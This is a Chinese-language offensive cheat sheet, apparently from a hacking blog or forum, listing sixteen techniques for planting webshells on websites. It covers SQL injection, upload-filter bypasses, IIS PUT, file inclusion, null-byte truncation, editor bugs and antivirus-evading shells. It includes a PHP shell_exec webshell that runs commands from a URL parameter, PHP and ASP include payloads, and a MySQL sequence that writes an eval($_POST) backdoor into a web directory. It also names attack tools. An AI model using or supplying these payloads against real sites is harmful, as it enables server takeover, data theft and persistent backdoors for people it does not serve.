常用方法简介:
一、0day拿webshell
参考工具:织梦漏洞利用小工具
二、通过注入漏洞拿Webshell
前提条件:具有足够权限,对写入木马的文件夹要有写入权限,知道网站绝对路径。
对于mssql注入漏洞,网站可以通过log备份、差异备份拿Webshell
对于mysql注入漏洞的网站可以通过into file函数将一句话木马写入,拿Webshell。
参考工具:Getwebshell增强版、pangolin、
三、通过远程命令执行拿Webshell
zhu.php
<?php $x=$_GET["z"]; echo "<pre>"; echo shell_exec($x); echo "<pre>"; ?>
然后再浏览器访问此php文件,跟一个z的参数是一句话木马,输出到cracer.php文件
跟着在浏览器访问一下这个php文件,再用菜刀连接就可以了
四、struts2拿Webshell
参考工具:鬼哥struts2、Struts2漏洞批量检测
五、通过用户上传头像拿Webshell
原理:用户注册后,有些网站可以上传头像图片、附件、文件等,可以利用此来上传Webshell
六、IIS写权限拿webshell
原理:通过找到有IIS写入权限的网站,put进去一个txt文件,目录必须有可写的权限,然后通过move方法进行重命名为xxx.php
参考工具:IIS put scanner
七、本地JS验证突破拿Webshell
当网站设置了JS来限制用户上传的文件类型时,我们可以通过删除JS文件或者修改上传文件类型突破上传限制拿Webshell
参考工具:使用burpsuit或fiddler代理工具提交,本地文件先改为XXX.jpg,上传时拦截,再把文件名后缀更改为php即可
八、修改网站上传类型配置拿Webshell
有的网站设置了上传类型的限制,修改其上传类型即可
九、文件包含拿Webshell
先将Webshell改为txt文件上传,然后上传一个脚本文件包含该txt文件,可绕过waf拿webshell
asp包含
1.<!--#include file="123.jpg"--> 2.调用的文件和被调用的文件必须在同一个目录,否则找不到 3.不同目录之间包含 <!--#include virtual="文件所在目录/123.jpg"-->
php包含
<?php include ("123.jpg")?>;
十、网站配置插马拿Webshell
通过找到网站默认配置,将一句话插入网站配置中间。
十一、利用编辑器漏洞拿Webshell
常见的编辑器漏洞有fckeditor、ewebeditor、cheditor等
十二、通过编辑器模板拿Webshell
通过对网站的模板进行编辑写入一句话,然后生成脚本文件拿webshell
通过将木马添加到压缩文件,把名字改为网站模板类型,上传到网站服务器拿webshell
十三、数据库命令执行拿webshell
可以利用phpmyadmin登录数据库使用数据库命令将木马导出,拿Webshell(适用于phpmyadmin比较老的版本)
create table study (cmd text NOT NULL); insert into study(cmd) VALUES ('<?php eval ($_POST[cmd])?>'); select cmd from study into outfile 'D:/www/rooney.php'; drop TABLE IF EXISTS study;
十四、00截断拿Webshell
在上传文件的时候,你上传的文件名可能会被网站自动改成别的名字,这个时候你可以尝试抓取文件上传数据包,将文件名改为XX.asp%00.jpg进行截断上传,拿webshell
十五、利用解析漏洞拿Webshell
IIS 5.X/6.0解析漏洞 IIS 7.0/IIS 7.5 /nginx < 8.03 畸形解析漏洞 nginx < 8.03 空字节代码执行漏洞 Apache 解析漏洞
十六:另类拿Webshell
更新页面拿 Webshell 上传插件拿Webshell 上传特殊马拿Webshell 上传免杀马过安全软件